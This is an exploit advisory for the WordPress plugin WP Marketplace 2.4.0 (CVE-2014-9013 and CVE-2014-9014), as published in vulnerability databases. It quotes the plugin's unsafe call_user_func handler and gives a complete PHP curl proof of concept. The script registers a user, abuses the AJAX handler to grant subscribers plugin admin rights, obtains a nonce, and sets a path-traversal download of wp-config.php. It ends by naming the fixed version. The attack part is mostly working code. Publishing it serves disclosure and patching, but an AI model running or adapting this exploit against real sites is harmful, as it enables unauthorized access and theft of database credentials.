# Exploit Title: WP Marketplace 2.4.0 Arbitrary File Download
#
Date
: 26-10-2014
# Software Link: https:
//wordpress.org/plugins/wpmarketplace/
# Exploit Author: Kacper Szurek
# Contact: http:
//twitter.com/KacperSzurek
# Website: http:
//security.szurek.pl/
# Category: webapps
# CVE: CVE-2014-9013
and
CVE-2014-9014
1. Description
Anyone can run user defined
function
because of call_user_func.
File: wpmarketplace\libs\cart.php
function
ajaxinit(){
if
(isset(
$_POST
[
'action'
]) &&
$_POST
[
'action'
]==
'wpmp_pp_ajax_call'
){
if
(function_exists(
$_POST
[
'execute'
]))
call_user_func(
$_POST
[
'execute'
],
$_POST
);
else
echo
__(
"function not defined!"
,
"wpmarketplace"
);
die
();
}
}
http:
//security.szurek.pl/wp-marketplace-240-arbitrary-file-download.html
2. Proof of Concept
$file
=
'../../../wp-config.php'
;
$user
=
'userlogin'
;
$email
=
'useremail@email.email'
;
$pass
=
'password'
;
$cookie
=
"/cookie.txt"
;
$ckfile
= dirname(
__FILE__
) .
$cookie
;
$cookie
=
fopen
(
$ckfile
,
'w'
)
or
die
(
"Cannot create cookie file"
);
// Register
$ch
= curl_init();
curl_setopt(
$ch
, CURLOPT_URL,
$url
.
'?checkout_register=register'
);
curl_setopt(
$ch
, CURLOPT_COOKIEJAR,
$cookie
);
curl_setopt(
$ch
, CURLOPT_TIMEOUT, 10);
curl_setopt(
$ch
, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt(
$ch
, CURLOPT_RETURNTRANSFER, 1);
curl_setopt(
$ch
, CURLOPT_POST, 1);
curl_setopt(
$ch
,
CURLOPT_POSTFIELDS,
array
(
'register_form'
=>
'register'
,
'reg[user_login]'
=>
$user
,
'reg[user_email]'
=>
$email
,
'reg[user_pass]'
=>
$pass
));
$content
= curl_exec(
$ch
);
if
(!preg_match(
"/success/i"
,
$content
)) {
die
(
"Cannot register"
);
}
// Log in
curl_setopt(
$ch
, CURLOPT_URL,
$url
.
'wp-login.php'
);
curl_setopt(
$ch
,
CURLOPT_POSTFIELDS,
array
(
'log'
=>
$user
,
'pwd'
=>
$pass
,
'wp-submit'
=>
'Log%20In'
));
$content
= curl_exec(
$ch
);
if
(!preg_match(
'/adminmenu/i'
,
$content
)) {
die
(
"Cannot login"
);
}
// Add subscriber as plugin admin
curl_setopt(
$ch
, CURLOPT_URL,
$url
);
curl_setopt(
$ch
,
CURLOPT_POSTFIELDS,
array
(
'action'
=>
'wpmp_pp_ajax_call'
,
'execute'
=>
'wpmp_save_settings'
,
'_wpmp_settings[user_role][]'
=>
'subscriber'
));
$content
= curl_exec(
$ch
);
if
(!preg_match(
'/Settings Saved Successfully/i'
,
$content
)) {
die
(
"Cannot set role"
);
}
// Request noonce
curl_setopt(
$ch
, CURLOPT_URL,
$url
);
curl_setopt(
$ch
,
CURLOPT_POSTFIELDS,
array
(
'action'
=>
'wpmp_pp_ajax_call'
,
'execute'
=>
'wpmp_front_add_product'
));
$content
= curl_exec(
$ch
);
preg_match(
'/name="__product_wpmp" value="([^"]+)"/i'
,
$content
,
$nonce
);
if
(
strlen
(
$nonce
[1]) < 2) {
die
(
"Cannot get nonce"
);
}
// Set file to download
curl_setopt(
$ch
, CURLOPT_URL,
$url
);
curl_setopt(
$ch
,
CURLOPT_POSTFIELDS,
array
(
'__product_wpmp'
=>
$nonce
[1],
'post_type'
=>
'wpmarketplace'
,
'id'
=>
'123456'
,
'wpmp_list[base_price]'
=>
'0'
,
'wpmp_list[file][]'
=>
$file
));
$content
= curl_exec(
$ch
);
header(
"Location: "
.
$url
.
"?wpmpfile=123456"
);
3. Solution:
Update to version 2.4.1
https:
//downloads.wordpress.org/plugin/wpmarketplace.2.4.1.zip